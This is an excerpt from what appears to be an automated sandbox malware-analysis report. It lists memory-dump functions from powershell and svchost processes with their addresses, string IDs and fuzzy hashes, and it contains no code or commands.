                                                                                                                                                                                                                                              • Source File: 00000011.00000002.1849618374.00007FFB4B1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1C0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffb4b1c0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: (B@K$(B@K$(B@K$(B@K$(B@K$h
                                                                                                                                                                                                                                              • API String ID: 0-1750128351
                                                                                                                                                                                                                                              • Opcode ID: fae4537713b891b42c46defc4bd164db32e8c1314b80fcb62e0867949b9bbd15
                                                                                                                                                                                                                                              • Instruction ID: daa7a7c787c94d1dafca300e96b6356a7b524814cea0f10004b1e3cf979f2f56
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fae4537713b891b42c46defc4bd164db32e8c1314b80fcb62e0867949b9bbd15
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4CD146A292EBC94FE7A6EF78C8191B57FE0EF56214B1801FED58CCB0A3D9189805C751
                                                                                                                                                                                                                                              Function 00007FFB4B0F9F7A Relevance: .2, Instructions: 180COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000011.00000002.1848744129.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffb4b0f0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: ad27a363108942b5a6499132486eac247de077d19d21e8330beb9f8f15700217
                                                                                                                                                                                                                                              • Instruction ID: 970ae0cbbedd159c3eca820ebea9e246ddb8ccbb2a9bfde55bd24e0c38f25860
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad27a363108942b5a6499132486eac247de077d19d21e8330beb9f8f15700217
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88512BB3A0D6854FD702BF7CE8A64E93B70EF5232AB0841B7C6848B163ED14545B8796
                                                                                                                                                                                                                                              Function 00007FFB4AFDEB80 Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000011.00000002.1847768126.00007FFB4AFDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AFDD000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffb4afdd000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 994642d1e60e451f169b27667e731e88d9963d91a74a198b6018cd8458148742
                                                                                                                                                                                                                                              • Instruction ID: f7830dd7f12fe3aaf62f97a6526e3923fa05c05ded30609c7eb5aac6f4d09462
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 994642d1e60e451f169b27667e731e88d9963d91a74a198b6018cd8458148742
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D41257180DBC44FE7579F38D8459A23FB4EF52224B2505EFD08ACB1A3D625B846C792
                                                                                                                                                                                                                                              Function 00007FFB4B0F9768 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000011.00000002.1848744129.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffb4b0f0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 593561bf9c30204a2878643deb21d4c316d5f99be04a73bf5d12c1692851800e
                                                                                                                                                                                                                                              • Instruction ID: 9ec0967d17414d1ecdc84fe796ba024ddb3f0abc1dcbedee8675fd4e10e0d9b4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 593561bf9c30204a2878643deb21d4c316d5f99be04a73bf5d12c1692851800e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A031EA7191CB4C8FDB589F5C980A6F97BE0FBA9311F00812FE449D3251DA70A855CBC2
                                                                                                                                                                                                                                              Function 00007FFB4B0FA47C Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000011.00000002.1848744129.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffb4b0f0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 19d2256f6030cb01a79a56f07d5491ffe25d2dade57de48ab55fedefd9615ba5
                                                                                                                                                                                                                                              • Instruction ID: 284a6c6f3289f505fd1ee8c590d8ef5fd69412d46c9ccad614a91d6a3d37776d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19d2256f6030cb01a79a56f07d5491ffe25d2dade57de48ab55fedefd9615ba5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB21F57090CB4C8FDB59DF68984A6E97BF0EB96321F04816BD448C3162DA74A416CB92
                                                                                                                                                                                                                                              Function 00007FFB4B0F33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000011.00000002.1848744129.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffb4b0f0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                              • Instruction ID: 34f38ac379fceacf7651eab063fd6adff6d4b2bfdd7d0428a57bc94a916a384c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1301677111CB0C8FDB44EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E882CB45
                                                                                                                                                                                                                                              Function 00007FFB4B1C4148 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000011.00000002.1849618374.00007FFB4B1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1C0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffb4b1c0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 909d0c947bdd1fd5da3cbc0b7c6e6e5b3086534881808563c98320cb42537941
                                                                                                                                                                                                                                              • Instruction ID: 8c3890b9b4344860e246cdf8d23870199bafa096e2fbb0e1801bd711fa19b0d3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 909d0c947bdd1fd5da3cbc0b7c6e6e5b3086534881808563c98320cb42537941
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1F09072A0CA058FE769EB6CE4414A473F0EF55324B1540B6E19DC7167DA29FC41CB90
                                                                                                                                                                                                                                              Function 00007FFB4B1C43FB Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000011.00000002.1849618374.00007FFB4B1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1C0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffb4b1c0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 576c01749eb2102d64fb782fae58636b1bdc88952099225f967cb2efacb5d1c7
                                                                                                                                                                                                                                              • Instruction ID: 271b63840e92c269acc0f434b2294afc15df8c942081a82d4b24b661e5ffb08f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 576c01749eb2102d64fb782fae58636b1bdc88952099225f967cb2efacb5d1c7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5F09AB2A0C6458FDB65EB2CE4418A8B7F0FF45324B1100F6E14DCB063DA2AEC41CB50
                                                                                                                                                                                                                                              Function 00007FFB4B1C41D1 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000011.00000002.1849618374.00007FFB4B1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1C0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffb4b1c0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                                                                                              • Instruction ID: 4aba499da6b755b22acaae2c77b8e7c0d4d350aa966e7f1266d4d360c5d97c2a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3E0E531B1C808CFAA68EA0DE1419A973E1EB9832571151A6D28EC7566CA22FC518B80

                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                              Function 00007FFB4B0F8995 Relevance: 5.1, Strings: 4, Instructions: 134COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000011.00000002.1848744129.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffb4b0f0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: L_^$L_^$L_^$L_^
                                                                                                                                                                                                                                              • API String ID: 0-2357752022
                                                                                                                                                                                                                                              • Opcode ID: b98917abb46b21abe948598df906092fdbb30f899ff1ac468762db1e6c1fd881
                                                                                                                                                                                                                                              • Instruction ID: c07f606b552418c38faaeda9a2d25efd56de069dcdd7c14ef5f01f7fefb0b501
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b98917abb46b21abe948598df906092fdbb30f899ff1ac468762db1e6c1fd881
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A41D4E3B0E7C24FE3579A3989A54D57FA0EF5221570D91F7C2848B1A3EE58140B8352
                                                                                                                                                                                                                                              Function 00007FFB4B0F8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000011.00000002.1848744129.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffb4b0f0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: L_^4$L_^7$L_^F$L_^J
                                                                                                                                                                                                                                              • API String ID: 0-3225005683
                                                                                                                                                                                                                                              • Opcode ID: 8102688ab214c8cdd39813c713289ae0ebbb44b5a4c555a5b4d77903fd85f6ad
                                                                                                                                                                                                                                              • Instruction ID: 82058f39f096fbfc9d493d0c66011bf46f19d92331cb1ae22850c7f48eb4fbe9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8102688ab214c8cdd39813c713289ae0ebbb44b5a4c555a5b4d77903fd85f6ad
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF2143B77082258EC3023FBDF8489ED3764CF9523135552F2D2998B003EA14708B8BE4

                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                              Function 00007FFB4B1D6605 Relevance: 6.7, Strings: 5, Instructions: 443COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000013.00000002.2093708750.00007FFB4B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ffb4b1d0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: (BAK$(BAK$(BAK$(BAK$(BAK
                                                                                                                                                                                                                                              • API String ID: 0-3163485261
                                                                                                                                                                                                                                              • Opcode ID: a47e504d9eb6b57ffd710c81c5892b6e51e4d0120117aa951a3e2cae8902dc5b
                                                                                                                                                                                                                                              • Instruction ID: 1c54dc7d232287e860ca2a829c2c0ed1b79f87e967e1637e834dd8b021fe3791
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a47e504d9eb6b57ffd710c81c5892b6e51e4d0120117aa951a3e2cae8902dc5b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46D176B2A1EB894FE7A6EE78C8141B57BE4EF16318B1801FED54CCB0A3D918AC05C751
                                                                                                                                                                                                                                              Function 00007FFB4B1D4073 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000013.00000002.2093708750.00007FFB4B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ffb4b1d0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 8>AK
                                                                                                                                                                                                                                              • API String ID: 0-843194772
                                                                                                                                                                                                                                              • Opcode ID: 25b585d6994d144426d876ccac9b561ca5a2c0188c3bd053ac2987b8719ece40
                                                                                                                                                                                                                                              • Instruction ID: da1526a1e23c8c72e86dd35301631355b4eb7e8317fe0a09dbf1829fa23b067f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25b585d6994d144426d876ccac9b561ca5a2c0188c3bd053ac2987b8719ece40
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99517872A2CA4A8FE799EE3CC5126B577D5EF95324B0841BAC24DC71A3DD24FC058781
                                                                                                                                                                                                                                              Function 00007FFB4B1D4370 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000013.00000002.2093708750.00007FFB4B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ffb4b1d0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: p>AK
                                                                                                                                                                                                                                              • API String ID: 0-1826771270
                                                                                                                                                                                                                                              • Opcode ID: df3bf136ddb76d55ec9be51ff6b47eb4da67e19380c79f13db8d649bfbd0526a
                                                                                                                                                                                                                                              • Instruction ID: f4d8a1dd8cb0f6610fd09065b45e403205c5607dd02c758051874b4644bb84b6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df3bf136ddb76d55ec9be51ff6b47eb4da67e19380c79f13db8d649bfbd0526a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 584177B2A1DA594FE7A9EE3CD4106B47BD5EF85324B0801FAC28DC71A3EA14FD018791
                                                                                                                                                                                                                                              Function 00007FFB4B1D40BF Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000013.00000002.2093708750.00007FFB4B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ffb4b1d0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 8>AK
                                                                                                                                                                                                                                              • API String ID: 0-843194772
                                                                                                                                                                                                                                              • Opcode ID: 8db9b86ea4ae9ccca54655f57fec79d05d94867c0f08ba0c2555734f2314606b
                                                                                                                                                                                                                                              • Instruction ID: 788e510fbeaa14867650e31439b2bad4d8ec01db5ae044eae865b251788ce8c8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8db9b86ea4ae9ccca54655f57fec79d05d94867c0f08ba0c2555734f2314606b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 712106B3A2DA878FE7A9EE2CC65257467D9EF54314B4881BAD25DC71B2CD18FC008B41
                                                                                                                                                                                                                                              Function 00007FFB4B1D43BC Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000013.00000002.2093708750.00007FFB4B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1D0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ffb4b1d0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: p>AK
                                                                                                                                                                                                                                              • API String ID: 0-1826771270
                                                                                                                                                                                                                                              • Opcode ID: 152c54874824c6ff0b689d603a5c7a22d0132583ed98501f011f3ed143bac65b
                                                                                                                                                                                                                                              • Instruction ID: fd70655ddf849a72775dcace31b6f917f0ef13f63ddefe6ecf4dab38ab0df166
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 152c54874824c6ff0b689d603a5c7a22d0132583ed98501f011f3ed143bac65b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB1136B2D2EA554FE3A5EF3CD4605B83BE4EF4532470800F6D29CC71A2DA19BC408B51
                                                                                                                                                                                                                                              Function 00007FFB4B109780 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000013.00000002.2092263719.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ffb4b100000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: bd110fed8ec51c97116bcd3edf04a639cc085c081cff29b000f29f9b576d36e5
                                                                                                                                                                                                                                              • Instruction ID: 106d87ea4936143b6d2b4c249cb405ba0918e924ae542f3d5fd743aaa79c477b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd110fed8ec51c97116bcd3edf04a639cc085c081cff29b000f29f9b576d36e5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E31F87191CB884FDB589F5C9C066A97BF0FBA9310F00426FE449D3652DA70A815CBC6
                                                                                                                                                                                                                                              Function 00007FFB4AFEEB80 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000013.00000002.2090890367.00007FFB4AFED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AFED000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ffb4afed000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: b6b273b025f5dd1608a2cb4492de73ca90b3ee5728506c432de6e0a7a8370c94
                                                                                                                                                                                                                                              • Instruction ID: b5a2d5c28903111be53219ad5cc03c32fade620802600e904d0334bda1c9aa50
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6b273b025f5dd1608a2cb4492de73ca90b3ee5728506c432de6e0a7a8370c94
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF41237140DBC46FE7569F38E8819523FF4EF52224B2505EFD089CB1A3D629A806C792
                                                                                                                                                                                                                                              Function 00007FFB4B10B258 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000013.00000002.2092263719.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ffb4b100000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: b36c2ca3561e455cf5863176b6acd4f3fc644729a9166cfbc8630de1ef7d1959
                                                                                                                                                                                                                                              • Instruction ID: 678265d1d95041408e3cbbf7936d832418df570d446b0e4a83b89863cb2b2c24
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b36c2ca3561e455cf5863176b6acd4f3fc644729a9166cfbc8630de1ef7d1959
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F21E67190CA4C8FDB58DF5CD84A6E97BF0EBA6320F04816FD049C7162D670584ACB91
                                                                                                                                                                                                                                              Function 00007FFB4B1033B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000013.00000002.2092263719.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ffb4b100000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                              • Instruction ID: d6b6772af610015bd376195b165a8f248b53ffd53b7dfa8e0f995a78d3830d20
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A501677111CB0D8FDB44EF0CE451AA5B7E0FB99364F10056DE58AC3661DA36E882CB45
                                                                                                                                                                                                                                              Function 00007FFB4B10A0FB Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000013.00000002.2092263719.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ffb4b100000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f760c76fb5572f51dab70dee6e24638d52866077f2280c9cf9adea4ed78291e6
                                                                                                                                                                                                                                              • Instruction ID: 59b65f6b61c9add31043c8fd87e999916b78294267e5f88134d301a0ddbf755e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f760c76fb5572f51dab70dee6e24638d52866077f2280c9cf9adea4ed78291e6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0F0C8B692DA8C4FEB81EF28D8564D47FE0FF55205B0442B7E548C70A1DA21A4498BC1

                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                              Function 00007FFB4B108BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000013.00000002.2092263719.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ffb4b100000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: K_^8$K_^<$K_^?$K_^J$K_^K$K_^N$K_^Q$K_^Y
                                                                                                                                                                                                                                              • API String ID: 0-2350917820
                                                                                                                                                                                                                                              • Opcode ID: bc87f67d5ee211d0230bc6426bec13470efd9727eb4ff8c2f699d3309f46b341
                                                                                                                                                                                                                                              • Instruction ID: 0c7b43da9ad8d3e55614bfbc3ad4df40a598ee1a949aef194e89735e7f6769e6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc87f67d5ee211d0230bc6426bec13470efd9727eb4ff8c2f699d3309f46b341
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E2126B3A186159ACA023A7CF8869D877B4DF5537935502F3E418CF013DD14A48B8B94

                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                              Function 00007FFB4B0F1CA1 Relevance: .2, Instructions: 207COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000019.00000002.2171632848.00007FFB4B0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0F0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_25_2_7ffb4b0f0000_svchost.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: cb67044c1718e168850256710079855a6ee0c5961a0dc58c957fe3930c4e7e14
